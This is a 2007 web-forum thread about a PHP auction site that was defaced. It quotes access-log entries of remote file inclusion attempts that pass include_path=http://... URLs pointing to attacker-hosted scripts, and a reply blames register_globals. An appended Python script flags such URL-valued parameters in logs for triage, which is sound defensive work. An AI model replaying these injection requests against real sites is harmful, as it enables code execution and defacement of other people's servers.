Posted by Charles Crume on 10/16/07 02:36
Hi Jerry;
Thanks!!!
I am using an auction software package that *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
"Jerry Stuckle" <jstucklex@attglobal.net> wrote in message
news:D7-dnQ0RJ6npTY_anZ2dnUVZ_gOdnZ2d@comcast.com...
> Charles Crume wrote:
>> Hello Everyone;
>>
>> My site was hacked the other day -- someone was able to rename my
>> index.shtml file and put their own index.html file on my server. Not sure
>> how it was done, but looking through the log file, I found lots and
>> lots of entries where an "include_path" parameter was included in the URL
>> of the PHP page, as shown below:
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>
>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>> what the effect of including it in the URL is. A number of entries show a
>> code 404 as the culprits are obviously phishing for pages, but requests
>> with return code 200 are showing a large number of bytes transferred --
>> far larger than the PHP page itself.
>>
>> Can someone explain what adding "include_path" to a URL does?
>>
>> Is there something I need to check on my server, or in how I've got Apache
>> configured?
>>
>> TIA.
>>
>> Charles...
>>
>
> The include_path itself in the url is just a variable. It's what you do
> with it that's important. For instance, if you have register_globals
> enabled, the include_path in the URL may override the system include_path.
>
> Or, depending on what else you do in your code. This is a big reason why
> it's good to use $_POST instead of $_REQUEST if you're posting a form to a
> page - $_POST will ignore any $_GET parameters.
>
> And just another reason to *ALWAYS* validate data coming from the user.
>
> --
> ==================
> Remove the "x" from my email address
> Jerry Stuckle
> JDS Computer Training Corp.
> jstucklex@attglobal.net
> ==================
>
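Added example, not from this thread or the auction package: a small Python triage of Apache combined-format access log lines like the ones in the post. It flags every request whose query string carries a parameter whose value is itself a URL (the pattern that, with register_globals on, can turn into a `$include_path` variable), separates 404 probes from 200 responses whose byte counts should then be compared with the page's normal size, and groups the findings by client IP. The three attacker lines are the post's own entries joined onto single lines; the 192.0.2.10 request is a constructed benign line.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
                    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$')
# A query parameter whose value is itself a URL (with register_globals on it may become $include_path).
REMOTE_PARAM_RE = re.compile(r'(?P<param>[A-Za-z_][\w\[\]]*)=(?P<url>(?:https?|ftp)://[^&\s"]+)')

def parse_line(line):
    """Parse one combined-log line into a dict; None if the line does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec

def classify(rec):
    """None for an ordinary request, else (kind, param, url): 'hit' when the script ran (HTTP 200)
    with a URL-valued parameter, so its byte count deserves a look; 'probe' for any other status."""
    m = REMOTE_PARAM_RE.search(rec["target"])
    if not m:
        return None
    return ("hit" if rec["status"] == 200 else "probe"), m.group("param"), m.group("url")

def triage(lines):
    """Group URL-valued-parameter requests by client IP: counts, parameters, remote hosts, sizes."""
    report = defaultdict(lambda: {"probe": 0, "hit": 0, "params": set(), "hosts": set(), "hit_bytes": []})
    for line in lines:
        rec = parse_line(line)
        finding = classify(rec) if rec else None
        if finding is None:
            continue
        kind, param, url = finding
        entry = report[rec["ip"]]
        entry[kind] += 1
        entry["params"].add(param)
        entry["hosts"].add(url.split("/", 3)[2])  # host part of the remote URL
        if kind == "hit":
            entry["hit_bytes"].append(rec["bytes"])
    return dict(report)

# Three entries taken from the post (wrapped lines joined) plus one constructed benign request.
SAMPLE_LOG = [
    '69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"',
    '213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET /index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.808"',
    '213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"',
    '192.0.2.10 - - [11/Oct/2007:16:00:00 -0400] "GET /auction/index.php HTTP/1.1" 200 12000 "-" "Mozilla/5.0"',
]
```

Run `triage(SAMPLE_LOG)` on a full access log and any IP with a non-zero `hit` count is one whose injected parameter reached a script that executed; the `hit_bytes` values are what the post's observation about oversized 200 responses refers to.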